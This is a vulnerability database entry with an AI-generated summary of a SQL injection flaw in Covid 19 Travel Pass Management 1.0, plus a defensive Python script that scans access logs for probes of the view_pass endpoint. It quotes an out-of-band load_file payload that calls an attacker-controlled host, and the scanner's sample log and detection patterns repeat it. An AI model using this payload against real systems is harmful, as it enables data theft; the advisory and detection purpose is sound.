CVE-2022-30054
Description
In Covid 19 Travel Pass Management 1.0, the code parameter is vulnerable to SQL injection attacks.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
SQL injection in the `code` parameter of Covid 19 Travel Pass Management 1.0 allows blind injection and file read via MySQL's load_file.
Vulnerability
Covid 19 Travel Pass Management 1.0 contains a SQL injection vulnerability in the code parameter, as described in [1]. The application uses the code parameter in a GET request to the view_pass.php page. The parameter is directly concatenated into SQL queries without sanitization, allowing an attacker to inject arbitrary SQL statements. The vendor has not released a fix, and the version is end-of-life or unsupported. Affected application: Covid 19 Travel Pass Management version 1.0 [1].
Exploitation
An attacker can exploit the vulnerability without authentication by sending a crafted GET request to the vulnerable endpoint `page=view_pass&code=...` [1]. The reference demonstrates multiple payloads for boolean-based blind, error-based, time-based blind, and UNION query injection [1]. One specific payload uses `load_file()` to read files from the database server, such as `'+(select load_file('\\\\attacker-controlled-domain\\path'))+'` [1]. The application interacted with an external domain, confirming the SQL injection was successfully executed [1].
Impact
Successful exploitation enables the attacker to extract sensitive data from the database, including administrator credentials and information about all accounts on the system [1]. The attacker can use the load_file function to read arbitrary files from the database server's filesystem, potentially leading to complete compromise of the application and underlying server [1]. The attacker may also perform UNION-based queries to dump the database contents, as the payload uses 10 columns in the UNION query [1].
Mitigation
No official patch or fix is available from the vendor for this version [1]. Users should immediately upgrade to a patched version if available; otherwise, they must apply input validation and parameterized queries to the code parameter as a workaround [1]. The application appears to be end-of-life, so migration to a supported alternative is recommended [1]. There is no indication that this CVE is listed in the CISA Known Exploited Vulnerabilities (KEV) catalog.
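With no vendor fix available, web-server access logs are where to check whether the `view_pass` endpoint has already been probed. The triage script below is an added example, not code from the referenced write-up or the application. It assumes combined-format access logs and that legitimate pass codes are short alphanumeric tokens, and its sample log lines are constructed.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Assumption: legitimate pass codes are short alphanumeric tokens.
SAFE_CODE = re.compile(r"[A-Za-z0-9_-]{1,64}")
# Techniques named in the write-up above, matched on the decoded value.
INDICATORS = {
    "file_read": re.compile(r"load_file\s*\(", re.I),
    "unc_path": re.compile(r"\\{2,}[\w.-]+"),
    "union": re.compile(r"\bunion\b.+\bselect\b", re.I | re.S),
}
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (documentation addresses, reserved hostname).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /?page=view_pass&code=AB12CD34 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /?page=view_pass&code=%27%2B(select%20load_file(%27%5C%5C%5C%5Cexample.invalid%5C%5Cx%27))%2B%27 HTTP/1.1" 200 812',
    '203.0.113.7 - - [01/Jan/2024:10:00:12 +0000] "GET /?page=home HTTP/1.1" 200 900',
]

def decode_fully(value, rounds=3):
    """Normalise nested URL encoding before pattern matching."""
    for _ in range(rounds):
        value = unquote_plus(value)
    return value

def inspect_line(line):
    """Return sorted findings for a view_pass request, or None for other lines."""
    m = REQUEST.search(line)
    if not m:
        return None
    query = parse_qs(urlsplit(m.group(1)).query, keep_blank_values=True)
    if query.get("page", [""])[0] != "view_pass" or "code" not in query:
        return None
    findings = set()
    for raw in query["code"]:  # every repeated code= value is checked
        if not SAFE_CODE.fullmatch(raw):
            findings.add("unexpected_chars")
        decoded = decode_fully(raw)
        findings.update(n for n, rx in INDICATORS.items() if rx.search(decoded))
    return sorted(findings)

def scan(lines):
    """Return [(line_number, findings)] for requests that need triage."""
    checked = ((i, inspect_line(line)) for i, line in enumerate(lines, 1))
    return [(i, f) for i, f in checked if f]

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

The allow-list check is the main signal because it flags any `code` value outside the assumed format. The named indicators only help prioritise which hits to examine first.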
AI Insight generated on May 27, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
- Covid 19 Travel Pass Management/Covid 19 Travel Pass Management
- Range: 1.0
Patches
No patches discovered yet.
References